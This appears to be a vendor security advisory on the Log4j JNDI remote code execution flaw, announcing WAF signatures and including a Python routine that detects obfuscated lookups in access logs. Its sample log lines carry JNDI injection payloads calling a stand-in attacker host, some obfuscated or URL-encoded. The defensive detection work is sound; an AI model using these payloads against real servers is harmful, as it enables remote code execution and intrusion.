Details of the vulnerability
Log4j is a Java-based logging framework maintained by the Apache Software Foundation. In Apache Log4j <=2.14.1, the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. The vulnerability affects the default configurations of several Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, which are used by numerous organizations, including Apple, Amazon, Cloudflare, Twitter, and Steam.
The vulnerability is triggered by sending a specific string to the Log4j software, which makes it simple to exploit. Because this software is so widely used, there are multiple attack vectors. Over the past few days, we have seen attackers increasingly obfuscate their reconnaissance and exploit attempts for this vulnerability.
Attack detection and protection
We are rolling out new signatures to detect Log4j exploit attempts and block them. These signatures were updated on December 13, 2021 to handle the latest evasions seen in the field. These signatures and settings block both GET and POST requests attempting this exploit.
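As an added illustration of the detection problem described above (this is example code, not part of this advisory or of the product's signatures), the routine below decodes URL encoding and folds nested lookup wrappers in access-log lines before checking for a JNDI lookup, so that the obfuscated and plain forms are judged alike. The folding rule, the sample log lines and the hostnames are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Innermost lookup: ${...} containing no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Fold nested Log4j lookups toward the text they would resolve to.

    Assumed folding rule: an inner ${a:b:c} yields its last colon-separated
    segment, minus the "-" that marks a default value. This collapses
    wrappers such as ${lower:j} to a single character for inspection.
    """
    text = unquote(unquote(text))  # undo single and double URL encoding

    def fold(match: re.Match) -> str:
        body = match.group(1)
        if body.lower().lstrip().startswith("jndi:"):
            return match.group(0)  # keep the outer jndi lookup intact
        segment = body.rsplit(":", 1)[-1]
        return segment[1:] if segment.startswith("-") else segment

    for _ in range(max_rounds):
        folded = _INNER.sub(fold, text)
        if folded == text:
            break
        text = folded
    return text

def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalization."""
    return _JNDI.search(normalize_lookups(line)) is not None

def scan_access_log(lines) -> list:
    """Return the 1-based numbers of lines carrying a JNDI lookup."""
    return [i for i, line in enumerate(lines, 1) if is_jndi_lookup(line)]

# Constructed sample access-log lines (hosts and paths are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [13/Dec/2021:10:00:02 +0000] "GET /?q=${jndi:ldap://attacker.example/a} HTTP/1.1" 200 12 "-" "curl/7.79"',
    '10.0.0.7 - - [13/Dec/2021:10:00:03 +0000] "POST /login HTTP/1.1" 302 0 "-" "${${lower:j}ndi:${lower:LDAP}://attacker.example/b}"',
    '10.0.0.8 - - [13/Dec/2021:10:00:04 +0000] "GET /s?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:00:05 +0000] "GET /docs?tpl=${date:yyyy} HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("flagged lines:", scan_access_log(SAMPLE_LOG))  # [2, 3, 4]
```

The last sample line shows why normalization rather than a bare `${` match is needed: an ordinary lookup such as `${date:yyyy}` folds to plain text and is not flagged.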
Web Application Firewall & CloudGen WAF
The latest signatures for this vulnerability are being rolled out to units in the field. While these signatures detect the variations seen so far, we continue to update them as new variants appear. As a best practice, we recommend updating your Log4j installations to the latest versions, in which this issue is fixed.